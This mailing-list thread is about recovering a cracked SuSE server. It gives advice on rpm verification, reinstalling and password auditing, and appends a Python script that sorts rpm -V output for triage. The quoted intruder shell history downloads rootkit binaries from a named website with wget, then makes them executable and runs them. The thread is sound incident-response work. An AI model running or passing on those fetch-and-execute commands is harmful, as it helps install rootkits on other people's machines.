I think nuclear weapons would be a good way to handle cracking sites, crackers, and spammers. (just kidding :-)

Seriously, try running "rpm --verify" on your system to verify that your system files are intact, or find out which aren't. But in the end, if your system has been compromised, a fresh reinstall is the only way to know that there are no hidden problems on the machine. Stick a temporary machine in its place to handle server duties, but I'd consider that machine toast.

As an aside, if a machine is handling company server duties, I won't put any user accounts on it except for admins (I don't know that the user you mentioned wasn't an admin, but just in case). Also, I'd run "crack" or "john" or some password cracking program to test the passwords used, to make sure they weren't too easy.

You have my sympathies. Having a machine cracked just makes me feel sick. :-(

HTH,
Kevin

Antun Balaz wrote:
Thanks again for helpful information.
New question: According to the history file of the user whose account was used for the intrusion, the rootkit was downloaded from www.cappy.biz:

cat /etc/issue
wget www.cappy.biz/0/*/k
chmod +x k
./k
wget www.cappy.biz/0/*/noparty
chmod +x noparty
./noparty
etc. etc.

Directory http://www.cappy.biz/0/*/ is very interesting. Can we somehow act against the owner of this site, so that the same thing doesn't happen to other SuSE users?
Best regards,
Antun Balaz Institute of Physics, Belgrade Serbia and Montenegro
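The "rpm --verify" step Kevin suggests produces one line per changed file, with a flag string (S size, M mode, 5 digest, D device, L symlink, U user, G group, T mtime, P capabilities on newer rpm) and an optional file-type marker (c config, d documentation, and so on). On a box with thousands of packages that output is long, and most of it is harmless: edited config files and touched mtimes. The script below is an added example, not something either poster ran; it parses that format and sorts the lines into "suspicious" (a non-config file whose content, mode, owner or link target changed, or that is missing), "expected" (config and documentation files) and "mtime_only". The sample output embedded in SAMPLE is constructed for the example, and the package names and paths in it are illustrative.

```python
import re
import sys
from dataclasses import dataclass

# rpm -V flag letters, in the column order rpm prints them.
# The 9th column (P, capabilities) exists only on newer rpm; older rpm prints 8.
FLAG_NAMES = {
    "S": "size", "M": "mode", "5": "digest", "D": "device", "L": "symlink",
    "U": "user", "G": "group", "T": "mtime", "P": "capabilities",
}

# Single-letter file-type marker rpm prints between the flags and the path.
FILE_TYPES = {"c": "config", "d": "documentation", "g": "ghost",
              "l": "license", "r": "readme"}

# '?' means rpm could not perform that test (e.g. unreadable file); it is not a change.
LINE_RE = re.compile(
    r"^(?P<flags>[SM5DLUGTP.?]{8,9}|missing)\s+"
    r"(?:(?P<ftype>[cdglr])\s+)?"
    r"(?P<path>/\S.*)$"
)

# Constructed sample of rpm -Va output for this example (not real output from the post).
SAMPLE = """\
S.5....T.  /bin/ls
S.5....T.  /bin/ps
.......T.  /usr/share/zoneinfo/Europe/Belgrade
SM5....T  c /etc/ssh/sshd_config
missing    /sbin/ifconfig
..5......  /usr/bin/netstat
.M.......  /usr/bin/passwd
S.5....T. d /usr/share/doc/packages/foo/README
"""


@dataclass
class VerifyResult:
    path: str
    changed: frozenset   # set of FLAG_NAMES values that rpm reported as changed
    ftype: str           # "config", "documentation", ... or "" for ordinary files
    missing: bool        # True for "missing   /path" lines


def parse_verify_line(line):
    """Parse one line of rpm -V output; return None for lines that are not in that format."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    flags = m.group("flags")
    if flags == "missing":
        changed, missing = frozenset(), True
    else:
        changed = frozenset(FLAG_NAMES[ch] for ch in flags if ch in FLAG_NAMES)
        missing = False
    return VerifyResult(m.group("path"), changed, FILE_TYPES.get(m.group("ftype"), ""), missing)


def triage(output):
    """Sort rpm -V output into buckets a responder would read in order of urgency."""
    buckets = {"suspicious": [], "expected": [], "mtime_only": []}
    for line in output.splitlines():
        r = parse_verify_line(line)
        if r is None:
            continue
        if r.ftype in ("config", "documentation", "readme", "license", "ghost"):
            # Admins edit configs and docs; ghost files are never installed, so
            # neither a changed digest nor "missing" is alarming here.
            buckets["expected"].append(r.path)
        elif r.missing or (r.changed - {"mtime"}):
            # A packaged binary/library that is missing, or whose digest, size,
            # mode, owner, link target, device or capabilities differ: classic
            # rootkit signature (trojaned ls, ps, netstat, ifconfig ...).
            buckets["suspicious"].append(r.path)
        else:
            # Only the timestamp moved; low priority on its own.
            buckets["mtime_only"].append(r.path)
    return buckets


if __name__ == "__main__":
    # Usage: rpm -Va | python3 triage.py   (falls back to SAMPLE when run interactively)
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    for bucket, paths in triage(data).items():
        print(f"== {bucket} ({len(paths)})")
        for p in paths:
            print("  ", p)
```

One caveat that matches Kevin's reinstall advice: rpm -V compares files against the RPM database on the same machine, and a rootkit that replaced /bin/ps can just as well have replaced rpm or edited /var/lib/rpm, so a clean verify is evidence, not proof. Run it from a rescue system against the suspect disk, or treat it only as a quick way to see what was touched before wiping the box.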